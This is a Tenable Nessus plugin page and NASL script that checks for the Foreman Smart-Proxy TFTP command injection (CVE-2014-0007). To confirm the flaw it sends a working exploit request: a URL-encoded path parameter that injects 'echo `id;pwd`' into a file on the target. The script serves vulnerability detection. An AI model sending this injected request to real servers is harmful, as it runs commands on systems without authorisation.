Foreman Smart-Proxy TFTP Remote Command Injection

2014-07-17T00:00:00
ID FOREMAN_SMART_PROXY_TFTP_COMMAND_INJECTION.NASL
Type nessus
Reporter Tenable
Modified 2018-11-28T00:00:00

Description

The remote web server is running a version of Foreman Smart-Proxy TFTP that is affected by a remote command injection vulnerability. An attacker can send a specially crafted URL that results in the execution of arbitrary commands.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(76578);
  script_version("1.7");
  script_cvs_date("Date: 2018/11/28 22:47:41");

  script_cve_id("CVE-2014-0007");
  script_bugtraq_id(68117);

  script_name(english:"Foreman Smart-Proxy TFTP Remote Command Injection");
  script_summary(english:"Checks the Foreman Smart-Proxy TFTP version.");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is affected by a remote command injection
vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote web server is running a version of Foreman Smart-Proxy TFTP
that is affected by a remote command injection vulnerability. An
attacker can send a specially crafted URL that results in the
execution of arbitrary commands.");
  script_set_attribute(attribute:"see_also", value:"https://projects.theforeman.org/issues/6086");
  script_set_attribute(attribute:"solution", value:"Update to version 1.4.5 / 1.5.1 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2014/06/05");
  script_set_attribute(attribute:"patch_publication_date", value:"2014/06/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/07/17");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:theforeman:foreman");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("foreman_smart_proxy_tftp_detect.nbin");
  script_require_keys("installed_sw/Foreman Smart-Proxy TFTP");
  script_require_ports("Services/www", 8443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");
include("data_protection.inc");

app_name = "Foreman Smart-Proxy TFTP";
get_install_count(app_name:app_name, exit_if_zero:TRUE);
port = get_http_port(default:8443);
vuln = FALSE;

# Only 1 install of the server is possible.
install = get_installs(app_name:app_name, port:port);
if (install[0] == IF_NOT_FOUND) audit(AUDIT_WEB_APP_NOT_INST, app_name, port);
install = install[1][0];

path = install['path'];
url = build_url(port:port, qs:path);

file_name = "nessus_" + unixtime() + ".txt";
post_data =
  '--' + bound + '\r\n' +
  'Content-Disposition: form-data; name="scanner"\r\n' +
  '\r\n' +
  'Nessus\r\n' +
  '--' + bound + '--';
bound = "_bound_nessus_" + unixtime();

headers = make_array(
  "Content-type", "multipart/form-data; boundary=" + bound,
  "Accept", "application/json"
);

exp_req =
  "/fetch_boot_file?prefix=a&path=%3Becho%20%60id%3Bpwd%60%20%3E%20public%2F" +
  file_name +
  "%3Becho";

cmd_pat = "uid=[0-9]+.*gid=[0-9]+.*";

res = http_send_recv3(
  method: "POST",
  item: url + exp_req,
  data: post_data,
  add_headers: headers,
  port: port,
  exit_on_fail: TRUE
);

sleep(1);

verify_url = url - "tftp" + file_name;

res = http_send_recv3(
  method: "GET",
  item: verify_url,
  port: port,
  exit_on_fail: TRUE
);
output = res[2];

if (egrep(pattern:cmd_pat, string:output))
{
  vuln = TRUE;
  get_up_path = "/";

  get_path = strstr(output, "/");
  get_up_path = chomp(get_path) + "/public/";
  if (!isnull(strstr(output, "uid")))
    output = strstr(output, "uid") - get_path;
}

if (!vuln) audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, url);

if (report_verbosity > 0)
{
  snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);

  report =
    '\n' + 'Nessus was able to verify the issue exists using the following request :' +
    '\n' +
    '\n' + verify_url +
    '\n' +
    '\n' + 'Note: This file has not been removed by Nessus, and will need to be' +
    '\n' + 'manually deleted (' + get_up_path + file_name + ').' +
    '\n';
  if (report_verbosity > 1)
  {
    report +=
      '\n' + 'This file was created using a POST request to : ' +
      '\n' + url + exp_req +
      '\n' +
      '\n' + 'To test the issue, Nessus had ' + app_name + ' execute the command "id"' +
      '\n' + 'which produced the following output :' +
      '\n' +
      '\n' + snip +
      '\n' + data_protection::sanitize_uid(output:chomp(output)) +
      '\n' + snip +
      '\n';
  }
  security_hole(extra:report, port:port);
}
else security_hole(port);